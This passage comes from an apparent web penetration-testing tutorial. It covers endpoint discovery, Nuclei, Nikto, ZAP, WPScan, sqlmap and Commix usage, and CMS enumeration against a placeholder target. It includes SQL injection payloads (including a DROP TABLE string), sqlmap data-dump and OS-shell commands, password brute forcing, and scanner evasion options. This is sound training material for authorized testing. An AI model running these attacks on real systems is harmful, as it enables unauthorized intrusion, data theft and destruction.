for id in $(seq 1 100); do
  code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com/api/users/$id" 2>/dev/null)
  if [ "$code" = "200" ]; then
    echo "[+] /api/users/$id → 200"
  fi
done

# File enumeration
# /uploads/1.jpg, /uploads/2.jpg
# /documents/report_001.pdf, /documents/report_002.pdf
# /backups/backup_20240101.zip
7. API Versioning Discovery
# Discover API versions
for ver in v0 v1 v2 v3 v4 v5 beta alpha internal dev latest; do
  for base in /api /rest /service /services; do
    code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com${base}/${ver}/" 2>/dev/null)
    if [ "$code" != "404" ] && [ "$code" != "000" ]; then
      echo "[+] ${base}/${ver}/ → $code"
    fi
  done
done

# Header-based versioning
for ver in 1 2 3 2024-01-01 2023-01-01; do
  for header in "Api-Version" "X-API-Version" "Accept-Version" "X-Api-Version"; do
    code=$(curl -s -o /dev/null -w "%{http_code}" \
      -H "$header: $ver" "https://target.com/api/users" 2>/dev/null)
    echo "$header: $ver → $code"
  done
done

# Accept header versioning
curl -s -H "Accept: application/vnd.api.v1+json" https://target.com/api/users
curl -s -H "Accept: application/vnd.api.v2+json" https://target.com/api/users

# Old API versions often lack security controls added in newer versions
8. WebSocket Endpoint Discovery
# Common WebSocket paths
WS_PATHS="/ws /websocket /socket /socket.io /sockjs
/ws/v1 /ws/v2 /realtime /live /stream
/notifications /chat /feed /events"

for path in $WS_PATHS; do
  # HTTP upgrade test
  code=$(curl -s -o /dev/null -w "%{http_code}" \
    -H "Upgrade: websocket" \
    -H "Connection: Upgrade" \
    -H "Sec-WebSocket-Version: 13" \
    -H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
    "https://target.com$path" 2>/dev/null)
  if [ "$code" = "101" ] || [ "$code" = "200" ]; then
    echo "[+] WebSocket endpoint: $path (HTTP $code)"
  fi
done

# Socket.IO detection
curl -s "https://target.com/socket.io/?EIO=4&transport=polling"

# WebSocket testing with websocat
websocat ws://target.com/ws
# or
websocat wss://target.com/ws

# wscat
wscat -c ws://target.com/ws
9. Configuration and Debug Endpoint Discovery
# Framework debug endpoints
# (/__clockwork and /telescope are Laravel-specific)
DEBUG_PATHS="
/debug /debug/default/view /debug/vars /debug/pprof
/_debug /__debug__ /debugbar
/console /__console
/werkzeug /werkzeug/console
/_profiler /profiler /_wdt
/actuator /actuator/env /actuator/configprops /actuator/mappings
/actuator/beans /actuator/health /actuator/info /actuator/metrics
/actuator/threaddump /actuator/heapdump /actuator/loggers
/actuator/auditevents /actuator/httptrace /actuator/scheduledtasks
/rails/info /rails/info/properties /rails/info/routes
/graphiql /playground /altair
/swagger /swagger-ui /api-docs /openapi.json
/info /health /status /version /env /metrics
/phpinfo.php /info.php /test.php /pi.php
/server-status /server-info /nginx_status
/trace /config /settings /setup
/adminer /phpmyadmin /pma
/elmah.axd /trace.axd
/__clockwork /telescope
"

for path in $DEBUG_PATHS; do
  code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com$path" 2>/dev/null)
  if [ "$code" = "200" ] || [ "$code" = "302" ]; then
    echo "[+] $path → $code"
  fi
done
Task 7
Vulnerability Scanning with Nuclei
1. Nuclei Fundamentals
# Installation
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

# Update templates
nuclei -update-templates

# Template directory
ls ~/.local/nuclei-templates/
# Categories: cves, exposures, misconfiguration, technologies,
# takeovers, vulnerabilities, default-logins, etc.

# Basic scan
nuclei -u https://target.com

# Scan with all templates
nuclei -u https://target.com -t nuclei-templates/

# Scan multiple targets
nuclei -l targets.txt -o results.txt
2. Template Categories and Usage
# CVE detection
nuclei -u https://target.com -t cves/
nuclei -u https://target.com -t cves/2024/ -t cves/2023/

# Technology detection
nuclei -u https://target.com -t technologies/

# Misconfiguration
nuclei -u https://target.com -t misconfiguration/

# Exposure (sensitive files, tokens)
nuclei -u https://target.com -t exposures/

# Default logins
nuclei -u https://target.com -t default-logins/

# Takeover detection
nuclei -l subdomains.txt -t takeovers/

# Specific vulnerability types
nuclei -u https://target.com -t vulnerabilities/
nuclei -u https://target.com -t vulnerabilities/xss/
nuclei -u https://target.com -t vulnerabilities/sqli/
nuclei -u https://target.com -t vulnerabilities/ssrf/
nuclei -u https://target.com -t vulnerabilities/lfi/
nuclei -u https://target.com -t vulnerabilities/rce/

# Fuzzing templates
nuclei -u https://target.com -t fuzzing/

# Headless templates (browser-based)
nuclei -u https://target.com -t headless/ -headless

# Filter by severity
nuclei -u https://target.com -severity critical,high
nuclei -u https://target.com -severity critical,high,medium -t cves/

# Filter by tags
nuclei -u https://target.com -tags sqli,xss,rce,lfi
nuclei -u https://target.com -tags wordpress
nuclei -u https://target.com -tags apache,nginx
nuclei -u https://target.com -tags cve2024

# Exclude templates
nuclei -u https://target.com -exclude-tags dos,fuzz
nuclei -u https://target.com -exclude-templates cves/2019/
3. Advanced Scanning Options
# Rate limiting
nuclei -l targets.txt -rate-limit 100   # requests per second
nuclei -l targets.txt -bulk-size 25     # parallel hosts
nuclei -l targets.txt -concurrency 10   # template concurrency

# Proxy through Burp
nuclei -u https://target.com -proxy http://127.0.0.1:8080

# Custom headers
nuclei -u https://target.com -H "Authorization: Bearer TOKEN"
nuclei -u https://target.com -H "Cookie: session=abc123"

# Follow redirects
nuclei -u https://target.com -follow-redirects

# Timeout settings
nuclei -u https://target.com -timeout 10   # seconds

# Retries
nuclei -u https://target.com -retries 3

# Output formats
nuclei -u https://target.com -o results.txt          # text
nuclei -u https://target.com -json -o results.json   # JSON (flag is -jsonl in nuclei v3)
nuclei -u https://target.com -me output_dir/         # markdown
nuclei -u https://target.com -se output_dir/         # SARIF
nuclei -u https://target.com -irr                    # include request/response

# Automatic scan
nuclei -u https://target.com -as   # automatic template selection based on tech

# Silent mode
nuclei -u https://target.com -silent

# Verbose/debug
nuclei -u https://target.com -v       # verbose
nuclei -u https://target.com -debug   # debug
4. Writing Custom Nuclei Templates
# Basic GET request template
id: custom-admin-panel

info:
  name: Admin Panel Detection
  author: pentester
  severity: info
  description: Detects admin panel
  tags: admin,panel

http:
  - method: GET
    path:
      - "{{BaseURL}}/admin"
      - "{{BaseURL}}/administrator"
      - "{{BaseURL}}/admin/login"

    matchers-condition: or
    matchers:
      - type: word
        words:
          - "admin"
          - "login"
          - "dashboard"
        condition: or

      - type: status
        status:
          - 200
          - 302
# POST request template
id: custom-sqli-check

info:
  name: SQL Injection Detection
  author: pentester
  severity: high
  tags: sqli

http:
  - method: POST
    path:
      - "{{BaseURL}}/login"
    body: "username=admin'&password=test"
    headers:
      Content-Type: application/x-www-form-urlencoded

    matchers-condition: or
    matchers:
      - type: word
        words:
          - "SQL syntax"
          - "mysql_fetch"
          - "ORA-"
          - "PostgreSQL"
          - "Microsoft SQL"
        condition: or
# Multiple requests with extractors
id: custom-api-enum

info:
  name: API Version Enumeration
  author: pentester
  severity: info
  tags: api

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/"
      - "{{BaseURL}}/api/v2/"
      - "{{BaseURL}}/api/v3/"

    matchers:
      - type: status
        status:
          - 200
          - 301

    extractors:
      - type: regex
        regex:
          - '"version":\s*"([^"]+)"'
# Template with conditions
id: custom-spring-actuator

info:
  name: Spring Boot Actuator Exposure
  author: pentester
  severity: high
  tags: spring,misconfig

http:
  - method: GET
    path:
      - "{{BaseURL}}/actuator"
      - "{{BaseURL}}/actuator/env"
      - "{{BaseURL}}/actuator/configprops"
      - "{{BaseURL}}/actuator/heapdump"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "spring"
          - "actuator"
          - "beans"
        condition: or
5. Nuclei Workflows
# workflow.yaml - chain templates together
id: web-recon-workflow

info:
  name: Web Reconnaissance Workflow
  author: pentester

workflows:
  - template: technologies/tech-detect.yaml
    subtemplates:
      - tags: wordpress
        templates:
          - cves/wordpress/
          - vulnerabilities/wordpress/
      - tags: apache
        templates:
          - cves/apache/
          - misconfiguration/apache/
      - tags: nginx
        templates:
          - cves/nginx/
          - misconfiguration/nginx/
      - tags: php
        templates:
          - cves/php/
          - vulnerabilities/php/
# Run workflow
nuclei -u https://target.com -w workflow.yaml

# Built-in workflows
nuclei -u https://target.com -w workflows/
6. Nuclei with Other Tools
# Pipeline: subfinder → httpx → nuclei
subfinder -d target.com -silent | httpx -silent | nuclei -t cves/ -o results.txt

# Pipeline: naabu (port scan) → httpx → nuclei
naabu -host target.com -p 80,443,8080,8443 -silent | httpx -silent | nuclei -severity critical,high

# From Burp Suite export
# Export URLs from Burp → use as nuclei input
nuclei -l burp_urls.txt -t vulnerabilities/

# With notify (send results to messaging)
nuclei -l targets.txt -t cves/ -severity critical | notify -provider slack

# Scheduled scanning
# crontab entry
# 0 0 * * * nuclei -l targets.txt -t cves/ -severity critical -o /tmp/nuclei_$(date +\%Y\%m\%d).txt
7. Nuclei for Specific Vulnerability Classes
# XSS detection
nuclei -u "https://target.com/search?q=test" -t fuzzing/xss/

# SQL Injection
nuclei -u "https://target.com/page?id=1" -t fuzzing/sqli/

# SSRF
nuclei -u https://target.com -t vulnerabilities/ssrf/

# Open redirect
nuclei -u https://target.com -t vulnerabilities/redirect/

# CORS misconfiguration
nuclei -u https://target.com -t misconfiguration/cors/

# Exposed panels
nuclei -u https://target.com -t exposed-panels/

# Default credentials
nuclei -u https://target.com -t default-logins/

# Token/secret exposure
nuclei -u https://target.com -t exposures/tokens/
nuclei -u https://target.com -t exposures/configs/

# File exposure
nuclei -u https://target.com -t exposures/files/
nuclei -u https://target.com -t exposures/backups/
8. Custom Fuzzing with Nuclei
# Parameter fuzzing template
id: param-sqli-fuzz

info:
  name: Parameter SQL Injection Fuzzer
  author: pentester
  severity: high
  tags: sqli,fuzz

http:
  - method: GET
    path:
      - "{{BaseURL}}?id={{url_encode(sqli_payload)}}"

    payloads:
      sqli_payload:
        - "1'"
        - "1 OR 1=1"
        - "1' OR '1'='1"
        - "1; DROP TABLE--"
        - "1 UNION SELECT NULL--"
        - "1' AND SLEEP(5)--"

    matchers-condition: or
    matchers:
      - type: word
        words:
          - "SQL syntax"
          - "mysql"
          - "ORA-"
          - "unclosed quotation"
        condition: or

      - type: dsl
        dsl:
          - 'duration>=5'
9. Results Analysis and Reporting
# Parse nuclei JSON output
cat nuclei_results.json | jq -r '.info.severity' | sort | uniq -c | sort -rn
cat nuclei_results.json | jq -r '.["template-id"]' | sort | uniq -c | sort -rn
cat nuclei_results.json | jq -r 'select(.info.severity == "critical") | .host'

# Generate summary report
nuclei -l targets.txt -t cves/ -severity critical,high -me report_dir/
# Creates markdown report in report_dir/

# Export for further analysis
nuclei -l targets.txt -json -o results.json -irr
# -irr includes full request/response for evidence

# Deduplicate results
cat nuclei_results.json | jq -s 'unique_by(.["template-id"] + .host)' > deduped.json
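If jq is not available, the JSONL output can be tallied with standard text tools — a sketch assuming the `"severity"` field layout of recent nuclei releases (adjust the pattern if your version's output differs):

```shell
# Tally findings per severity from nuclei JSONL without jq.
# Field name/layout is assumed from recent nuclei output.
severity_summary() {
  grep -o '"severity":"[a-z]*"' "$1" | cut -d'"' -f4 | sort | uniq -c | sort -rn
}

# Demo on sample (fabricated) result lines
cat > /tmp/nuclei_sample.json <<'EOF'
{"template-id":"a","info":{"severity":"critical"},"host":"https://x"}
{"template-id":"b","info":{"severity":"high"},"host":"https://x"}
{"template-id":"c","info":{"severity":"high"},"host":"https://y"}
EOF
severity_summary /tmp/nuclei_sample.json
```

Useful on minimal scan boxes where installing jq is not an option; for anything beyond counting, jq remains the better tool.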
10. Nuclei Scanning Strategy
#!/bin/bash
# nuclei_strategy.sh
TARGET_LIST=$1
OUTDIR="scans/nuclei_$(date +%Y%m%d)"
mkdir -p "$OUTDIR"

echo "=== Nuclei Scanning Strategy ==="

# Phase 1: Technology detection
echo "[1/5] Technology detection..."
nuclei -l "$TARGET_LIST" -t technologies/ -silent -o "$OUTDIR/tech.txt"

# Phase 2: Critical CVEs
echo "[2/5] Critical CVE scan..."
nuclei -l "$TARGET_LIST" -t cves/ -severity critical -silent -o "$OUTDIR/critical_cves.txt"

# Phase 3: Misconfigurations
echo "[3/5] Misconfiguration scan..."
nuclei -l "$TARGET_LIST" -t misconfiguration/ -t exposures/ -silent -o "$OUTDIR/misconfig.txt"

# Phase 4: Default logins
echo "[4/5] Default credential check..."
nuclei -l "$TARGET_LIST" -t default-logins/ -silent -o "$OUTDIR/default_logins.txt"

# Phase 5: Full vulnerability scan
echo "[5/5] Full vulnerability scan..."
nuclei -l "$TARGET_LIST" -t cves/ -t vulnerabilities/ -severity critical,high,medium \
  -silent -o "$OUTDIR/all_vulns.txt"

# Summary
echo "=== Results Summary ==="
echo "Technologies:        $(wc -l < "$OUTDIR/tech.txt" 2>/dev/null || echo 0)"
echo "Critical CVEs:       $(wc -l < "$OUTDIR/critical_cves.txt" 2>/dev/null || echo 0)"
echo "Misconfigurations:   $(wc -l < "$OUTDIR/misconfig.txt" 2>/dev/null || echo 0)"
echo "Default Logins:      $(wc -l < "$OUTDIR/default_logins.txt" 2>/dev/null || echo 0)"
echo "All Vulnerabilities: $(wc -l < "$OUTDIR/all_vulns.txt" 2>/dev/null || echo 0)"
echo "Results in: $OUTDIR/"
Task 8
Nikto and Web Vulnerability Scanners
1. Nikto - Web Server Scanner
# Basic scan
nikto -h https://target.com

# Scan specific port
nikto -h target.com -p 8080
nikto -h target.com -p 80,443,8080,8443

# With SSL
nikto -h https://target.com -ssl

# Through proxy
nikto -h https://target.com -useproxy http://127.0.0.1:8080

# Specific tuning options
nikto -h https://target.com -Tuning 123456789abcde
# Tuning options:
#   0 - File upload
#   1 - Interesting File / Seen in logs
#   2 - Misconfiguration / Default File
#   3 - Information Disclosure
#   4 - Injection (XSS/Script/HTML)
#   5 - Remote File Retrieval - Inside Web Root
#   6 - Denial of Service
#   7 - Remote File Retrieval - Server Wide
#   8 - Command Execution / Remote Shell
#   9 - SQL Injection
#   a - Authentication Bypass
#   b - Software Identification
#   c - Remote Source Inclusion
#   d - WebService
#   e - Administrative Console

# Output formats
nikto -h https://target.com -o nikto_results.html -Format html
nikto -h https://target.com -o nikto_results.xml -Format xml
nikto -h https://target.com -o nikto_results.csv -Format csv
nikto -h https://target.com -o nikto_results.txt -Format txt

# Scan with authentication
nikto -h https://target.com -id admin:password

# Custom user agent
nikto -h https://target.com -useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

# Specify root directory
nikto -h https://target.com -root /app

# Multiple targets
nikto -h targets.txt

# Evasion techniques
nikto -h https://target.com -evasion 1234567
#   1 - Random URI encoding
#   2 - Directory self-reference (/./)
#   3 - Premature URL ending
#   4 - Prepend long random string
#   5 - Fake parameter
#   6 - TAB as request spacer
#   7 - Change the case of the URL
#   8 - Use Windows directory separator (\)
2. OWASP ZAP - Automated Scanner
# ZAP command line scan
zap-cli quick-scan -s xss,sqli https://target.com
zap-cli active-scan https://target.com
zap-cli spider https://target.com

# ZAP Docker
docker run -t ghcr.io/zaproxy/zaproxy zap-baseline.py -t https://target.com
docker run -t ghcr.io/zaproxy/zaproxy zap-full-scan.py -t https://target.com
docker run -t ghcr.io/zaproxy/zaproxy zap-api-scan.py -t https://target.com/openapi.json

# ZAP API
# Start ZAP daemon
zap.sh -daemon -host 0.0.0.0 -port 8080 -config api.key=YOUR_API_KEY

# Spider via API
curl "http://localhost:8080/JSON/spider/action/scan/?url=https://target.com&apikey=KEY"

# Active scan via API
curl "http://localhost:8080/JSON/ascan/action/scan/?url=https://target.com&apikey=KEY"

# Get alerts
curl "http://localhost:8080/JSON/core/view/alerts/?apikey=KEY"

# Generate report
curl "http://localhost:8080/OTHER/core/other/htmlreport/?apikey=KEY" > report.html

# ZAP Automation Framework (automation.yaml)
# ZAP Automation Framework config
env:
  contexts:
    - name: "Target"
      urls:
        - "https://target.com"
      includePaths:
        - "https://target.com.*"
  parameters:
    failOnError: true
    failOnWarning: false
    progressToStdout: true

jobs:
  - type: spider
    parameters:
      context: "Target"
      maxDuration: 5
  - type: spiderAjax
    parameters:
      context: "Target"
      maxDuration: 5
  - type: passiveScan-wait
    parameters:
      maxDuration: 10
  - type: activeScan
    parameters:
      context: "Target"
      maxRuleDuration: 5
  - type: report
    parameters:
      template: "traditional-html"
      reportDir: "/tmp/"
      reportFile: "zap-report"
3. Burp Suite Scanner
# Burp Suite Professional Active Scanner

# Quick scan:
#   Dashboard → New scan → Crawl and audit → Enter URL → OK

# Custom scan configuration:
# Scan type:
#   - Crawl and audit (full scan)
#   - Crawl only (discovery)
#   - Audit selected items (targeted)

# Scan configuration — audit optimization:
#   - Scan speed: Fast/Normal/Thorough
#   - Audit accuracy: minimize false negatives/positives
#   - Skip checks: DoS, time-consuming

# Issue types to scan for:
#   - SQL injection
#   - XSS (reflected, stored, DOM)
#   - OS command injection
#   - Path traversal
#   - File upload
#   - XXE injection
#   - SSRF
#   - Deserialization
#   - Header injection
#   - Open redirect

# Scan specific requests:
#   Proxy → HTTP History → Right-click → Scan
#   Or select specific insertion points

# Scheduled scans:
#   Dashboard → New scan → Schedule tab
4. WPScan - WordPress Scanner
# Basic WordPress scan
wpscan --url https://target.com

# Enumerate plugins, themes, users
wpscan --url https://target.com -e ap,at,u
#   ap  - all plugins
#   vp  - vulnerable plugins
#   p   - popular plugins
#   at  - all themes
#   vt  - vulnerable themes
#   t   - popular themes
#   u   - users (1-10)
#   dbe - database exports

# With API token (vulnerability data)
wpscan --url https://target.com --api-token YOUR_TOKEN -e vp,vt

# Aggressive plugin detection
wpscan --url https://target.com --plugins-detection aggressive

# Password brute force
wpscan --url https://target.com -U users.txt -P passwords.txt

# Specific checks
wpscan --url https://target.com --enumerate u --force
wpscan --url https://target.com --enumerate p --plugins-version-detection aggressive

# Through proxy
wpscan --url https://target.com --proxy http://127.0.0.1:8080

# Output
wpscan --url https://target.com -o wpscan_results.json -f json
wpscan --url https://target.com -o wpscan_results.cli -f cli

# Stealthy scan
wpscan --url https://target.com --random-user-agent --throttle 500
5. SQLMap - SQL Injection Scanner
# Basic scan
sqlmap -u "https://target.com/page?id=1"

# With POST data
sqlmap -u "https://target.com/login" --data="username=admin&password=test"

# From Burp request file
sqlmap -r burp_request.txt

# Specify database type
sqlmap -u "https://target.com/page?id=1" --dbms=mysql

# Enumerate databases
sqlmap -u "https://target.com/page?id=1" --dbs

# Enumerate tables
sqlmap -u "https://target.com/page?id=1" -D database_name --tables

# Dump data
sqlmap -u "https://target.com/page?id=1" -D database_name -T users --dump

# All techniques
sqlmap -u "https://target.com/page?id=1" --technique=BEUSTQ
#   B - Boolean-based blind
#   E - Error-based
#   U - Union-based
#   S - Stacked queries
#   T - Time-based blind
#   Q - Inline queries

# Risk and level
sqlmap -u "https://target.com/page?id=1" --level=5 --risk=3

# Through proxy
sqlmap -u "https://target.com/page?id=1" --proxy=http://127.0.0.1:8080

# With cookies
sqlmap -u "https://target.com/page?id=1" --cookie="session=abc123"

# Tamper scripts (WAF bypass)
sqlmap -u "https://target.com/page?id=1" --tamper=space2comment,between

# OS shell
sqlmap -u "https://target.com/page?id=1" --os-shell

# Batch mode (non-interactive)
sqlmap -u "https://target.com/page?id=1" --batch
6. Commix - Command Injection Scanner
# Basic scan
commix -u "https://target.com/page?cmd=test"

# POST data
commix -u "https://target.com/execute" --data="command=ls"

# From file
commix -r request.txt

# Through proxy
commix -u "https://target.com/page?cmd=test" --proxy=http://127.0.0.1:8080

# Execute a single OS command
commix -u "https://target.com/page?cmd=test" --os-cmd="id"

# Specific technique (classic, eval-based, time-based, file-based)
commix -u "https://target.com/page?cmd=test" --technique=classic
7. Specialized Scanners
# testssl.sh - SSL/TLS testing
testssl.sh https://target.com
testssl.sh --vulnerable https://target.com

# SSLyze
sslyze target.com

# CMS scanners
droopescan scan drupal -u https://target.com   # Drupal
joomscan -u https://target.com                 # Joomla
magescan scan:all https://target.com           # Magento

# API scanners
# Astra - API security testing
# Postman + Newman for API test automation

# Cloud scanners
# ScoutSuite - multi-cloud security auditing
# Prowler - AWS security
# az-security-scan - Azure security
8. Scanner Result Interpretation
# Understanding scanner output severity:

# CRITICAL:
#   - Remote Code Execution (RCE)
#   - SQL Injection with data access
#   - Authentication bypass
#   - Deserialization RCE
#   Action: Exploit and report immediately

# HIGH:
#   - Stored XSS
#   - SSRF to internal services
#   - Local File Inclusion (LFI)
#   - Privilege escalation
#   Action: Verify manually and exploit

# MEDIUM:
#   - Reflected XSS
#   - CSRF
#   - Information disclosure
#   - Missing security headers
#   Action: Verify and document

# LOW:
#   - Cookie without Secure flag
#   - Missing HSTS
#   - Server version disclosure
#   - Directory listing
#   Action: Document in report

# INFO:
#   - Technology detection
#   - Open ports
#   - SSL certificate info
#   Action: Use for attack surface understanding

# False positive indicators:
#   - Generic error pages matching patterns
#   - WAF blocking causing detection
#   - Scanner misinterpreting normal behavior
#   - Time-based tests affected by network latency

# ALWAYS verify scanner findings manually!
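The severity-to-action mapping above can be captured as a tiny helper for triage scripts. This is a sketch: the function name and wording are ours, not part of any scanner's output.

```shell
# Map a scanner severity string to the triage action described above
triage_action() {
  case "$1" in
    critical) echo "Exploit and report immediately" ;;
    high)     echo "Verify manually and exploit" ;;
    medium)   echo "Verify and document" ;;
    low)      echo "Document in report" ;;
    info)     echo "Use for attack surface understanding" ;;
    *)        echo "Unknown severity: manual review" ;;
  esac
}

# Example: annotate each finding line such as "critical cve-2021-0001 host"
triage_action critical
triage_action low
```

A mapping like this slots naturally after the `jq -r '.info.severity'` extraction shown in the results-analysis section.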
9. Scanner Comparison
| Feature             | Nuclei  | Nikto  | ZAP     | Burp Pro   |
|---------------------|---------|--------|---------|------------|
| Speed               | Fast    | Medium | Slow    | Medium     |
| False positives     | Low     | Medium | Medium  | Low        |
| Customization       | High    | Low    | Medium  | High       |
| Active scanning     | Yes     | Yes    | Yes     | Yes        |
| Authenticated scan  | Yes     | Basic  | Yes     | Yes        |
| API scanning        | Limited | No     | Yes     | Yes        |
| CI/CD integration   | Easy    | Easy   | Easy    | Possible   |
| Reporting           | Basic   | Basic  | Good    | Excellent  |
| JavaScript analysis | Limited | No     | Yes     | Yes        |
| Custom templates    | YAML    | No     | Scripts | Extensions |
| Price               | Free    | Free   | Free    | Paid       |

# Recommended workflow:
# 1. Nuclei for fast, broad scanning
# 2. Nikto for server misconfiguration
# 3. ZAP/Burp for deep application scanning
# 4. Specialized tools for specific vulns (sqlmap, commix, etc.)
10. Scanner Automation Pipeline
#!/bin/bash
# scan_pipeline.sh
TARGET=$1
OUTDIR="scans/${TARGET}_$(date +%Y%m%d)"
mkdir -p "$OUTDIR"

echo "=== Vulnerability Scanning Pipeline: $TARGET ==="

# Phase 1: Nuclei (fast, broad)
echo "[1/4] Running Nuclei..."
nuclei -u "https://$TARGET" -severity critical,high,medium \
  -silent -o "$OUTDIR/nuclei.txt" 2>/dev/null
echo "[*] Nuclei findings: $(wc -l < "$OUTDIR/nuclei.txt" 2>/dev/null || echo 0)"

# Phase 2: Nikto (server-focused)
echo "[2/4] Running Nikto..."
nikto -h "https://$TARGET" -o "$OUTDIR/nikto.html" -Format html 2>/dev/null
echo "[*] Nikto complete"

# Phase 3: SSL/TLS check
echo "[3/4] SSL/TLS analysis..."
testssl.sh "https://$TARGET" > "$OUTDIR/ssl_test.txt" 2>/dev/null
echo "[*] SSL analysis complete"

# Phase 4: Header analysis
echo "[4/4] Security headers..."
curl -sI "https://$TARGET" > "$OUTDIR/headers.txt"

echo "=== Scan Complete ==="
echo "Results in: $OUTDIR/"
ls -la "$OUTDIR/"
Task 10
CMS Enumeration
1. CMS Detection
# Automated CMS detection
whatweb -a 3 https://target.com

# Manual detection indicators:

# WordPress
curl -s https://target.com | grep -i "wp-content\|wp-includes\|wordpress"
curl -s https://target.com/wp-login.php -o /dev/null -w "%{http_code}"
curl -s https://target.com/wp-json/wp/v2/ | head
curl -s https://target.com/xmlrpc.php -o /dev/null -w "%{http_code}"
curl -s https://target.com/readme.html | grep -i version

# Drupal
curl -s https://target.com | grep -i "drupal\|sites/default"
curl -s https://target.com/CHANGELOG.txt | head -5
curl -s https://target.com/core/CHANGELOG.txt | head -5
curl -s https://target.com/user/login -o /dev/null -w "%{http_code}"

# Joomla
curl -s https://target.com | grep -i "joomla\|/components/\|/modules/"
curl -s https://target.com/administrator/ -o /dev/null -w "%{http_code}"
curl -s https://target.com/administrator/manifests/files/joomla.xml | grep version

# Magento
curl -s https://target.com | grep -i "magento\|mage\|varien"
curl -s https://target.com/magento_version -o /dev/null -w "%{http_code}"
curl -s https://target.com/downloader/ -o /dev/null -w "%{http_code}"

# SharePoint
curl -s https://target.com/_layouts/ -o /dev/null -w "%{http_code}"
curl -s https://target.com/_vti_bin/ -o /dev/null -w "%{http_code}"
curl -s https://target.com/_api/web 2>/dev/null | head
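The same indicator strings can be applied offline to a saved copy of the homepage, avoiding a fresh request per check. A sketch: the file name and the exact indicator set are assumptions, the patterns overlap between CMSes, so treat the result as a first guess and confirm with the path probes above.

```shell
# Classify a saved page (e.g. `curl -s https://target.com > page.html`)
# using the fingerprint strings from this section
detect_cms() {
  html="$1"
  if grep -qiE 'wp-content|wp-includes|wordpress' "$html"; then
    echo "wordpress"
  elif grep -qiE 'drupal|sites/default' "$html"; then
    echo "drupal"
  elif grep -qiE 'joomla|/components/' "$html"; then
    echo "joomla"
  elif grep -qiE 'magento|varien' "$html"; then
    echo "magento"
  else
    echo "unknown"
  fi
}

# Demo on a mock WordPress fragment
printf '<link href="/wp-content/themes/x/style.css">' > /tmp/sample.html
detect_cms /tmp/sample.html
```

Ordering matters here: the WordPress strings are the most distinctive, so they are checked first; generic terms like `/modules/` are deliberately left out because Drupal sites match them too.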
2. WordPress Enumeration
# WPScan comprehensive scan
wpscan --url https://target.com -e ap,at,u,dbe --api-token $WPSCAN_TOKEN

# Version detection
curl -s https://target.com | grep -oP 'content="WordPress (\d+\.\d+\.?\d*)"'
curl -s https://target.com/readme.html | grep -i version
curl -s https://target.com/wp-links-opml.php | grep -i generator
curl -s https://target.com/feed/ | grep -i generator

# User enumeration
wpscan --url https://target.com -e u
# Manual:
curl -s "https://target.com/?author=1" -L | grep -oP 'author/\K[^/]+'
curl -s "https://target.com/wp-json/wp/v2/users" | jq '.[].slug'
for i in $(seq 1 20); do
  user=$(curl -s "https://target.com/?author=$i" -L -o /dev/null -w "%{url_effective}" | grep -oP 'author/\K[^/]+')
  [ -n "$user" ] && echo "[+] User $i: $user"
done

# Plugin enumeration
wpscan --url https://target.com -e ap --plugins-detection aggressive
# Manual:
curl -s https://target.com | grep -oP '/wp-content/plugins/\K[^/]+' | sort -u
curl -s https://target.com/wp-content/plugins/ 2>/dev/null   # Directory listing

# Theme enumeration
wpscan --url https://target.com -e at
curl -s https://target.com | grep -oP '/wp-content/themes/\K[^/]+' | sort -u

# WordPress API endpoints
curl -s https://target.com/wp-json/ | jq '.routes | keys[]'
curl -s https://target.com/wp-json/wp/v2/posts | jq '.[].title.rendered'
curl -s https://target.com/wp-json/wp/v2/pages | jq '.[].title.rendered'
curl -s https://target.com/wp-json/wp/v2/users | jq '.[].name'
curl -s https://target.com/wp-json/wp/v2/media | jq '.[].source_url'
curl -s https://target.com/wp-json/wp/v2/categories | jq '.[].name'

# XMLRPC methods
curl -s -X POST https://target.com/xmlrpc.php \
  -H "Content-Type: text/xml" \
  -d '<?xml version="1.0"?><methodCall><methodName>system.listMethods</methodName></methodCall>'

# Check for debug.log
curl -s https://target.com/wp-content/debug.log | head

# Common vulnerable paths
curl -s https://target.com/wp-config.php~ -o /dev/null -w "%{http_code}"
curl -s https://target.com/wp-config.php.bak -o /dev/null -w "%{http_code}"
curl -s https://target.com/.wp-config.php.swp -o /dev/null -w "%{http_code}"
3. Drupal Enumeration
# Droopescan
droopescan scan drupal -u https://target.com

# Version detection
curl -s https://target.com/CHANGELOG.txt | head -5
curl -s https://target.com/core/CHANGELOG.txt | head -5
curl -s https://target.com/core/install.php 2>/dev/null | head
curl -s https://target.com | grep -oP 'Drupal [\d.]+'

# Module enumeration — common modules to check:
DRUPAL_MODULES="views ctools token pathauto entity libraries admin_menu date features field_group ckeditor webform metatag redirect rules block panels google_analytics jquery_update backup_migrate"
for mod in $DRUPAL_MODULES; do
  code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com/modules/$mod/" 2>/dev/null)
  code2=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com/modules/contrib/$mod/" 2>/dev/null)
  if [ "$code" = "200" ] || [ "$code" = "403" ] || [ "$code2" = "200" ] || [ "$code2" = "403" ]; then
    echo "[+] Module found: $mod"
  fi
done

# User enumeration
curl -s "https://target.com/user/1" -L -o /dev/null -w "%{http_code}"
for i in $(seq 0 20); do
  code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com/user/$i" 2>/dev/null)
  if [ "$code" = "200" ]; then
    echo "[+] User $i exists"
  fi
done

# Drupal-specific vulnerabilities:
# Drupalgeddon  (CVE-2014-3704) - SQL injection
# Drupalgeddon2 (CVE-2018-7600) - RCE
# Drupalgeddon3 (CVE-2018-7602) - RCE
nuclei -u https://target.com -t cves/drupal/
4. Joomla Enumeration
# JoomScan
joomscan -u https://target.com

# Version detection
curl -s https://target.com/administrator/manifests/files/joomla.xml | grep '<version>'
curl -s https://target.com/language/en-GB/en-GB.xml | grep '<version>'
curl -s https://target.com | grep -oP 'Joomla!?\s*[\d.]+'

# Component enumeration
JOOMLA_COMPS="com_content com_users com_contact com_search com_finder com_newsfeeds com_tags com_fields com_redirect com_config com_media com_modules com_plugins com_templates com_categories com_banners com_wrapper com_weblinks"
for comp in $JOOMLA_COMPS; do
  code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com/components/$comp/" 2>/dev/null)
